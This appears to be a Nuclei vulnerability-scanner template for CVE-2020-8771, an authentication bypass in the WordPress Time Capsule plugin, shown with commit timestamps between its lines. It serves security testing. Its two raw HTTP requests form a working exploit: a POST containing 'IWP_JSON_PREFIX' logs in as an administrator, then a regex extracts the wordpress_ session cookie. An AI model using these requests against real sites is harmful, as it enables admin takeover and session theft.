2021-07-20 05:49:16 +00:00
id : CVE-2020-8771
2021-03-10 06:59:08 +00:00
info :
2022-04-29 19:58:07 +00:00
name : WordPress Time Capsule < 1.21.16 - Authentication Bypass
2021-03-10 06:59:08 +00:00
author : princechaddha
severity : critical
2022-05-17 09:18:12 +00:00
description : WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/SECFORCE/WPTimeCapsulePOC
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8771
2022-05-17 09:18:12 +00:00
- https://wpvulndb.com/vulnerabilities/10010
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8771
cwe-id : CWE-287
2023-07-11 19:49:27 +00:00
epss-score : 0.07093
cpe : cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : wptimecapsule
product : wp_time_capsule
tags : cve,cve2020,wordpress,wp-plugin
2021-03-10 06:59:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-10 06:59:08 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Connection : close
Accept : */*
IWP_JSON_PREFIX
- |
GET /wp-admin/index.php HTTP/1.1
Host : {{Hostname}}
Connection : close
Accept : */*
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2021-03-10 06:59:08 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-03-10 06:59:08 +00:00
words :
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
- "<h1>Dashboard</h1>"
condition : and
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-03-10 06:59:08 +00:00
words :
- 'text/html'
- type : status
status :
- 200
extractors :
- type : regex
2021-03-10 11:36:11 +00:00
regex :
2021-07-20 05:49:16 +00:00
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
2023-07-11 19:49:27 +00:00
part : header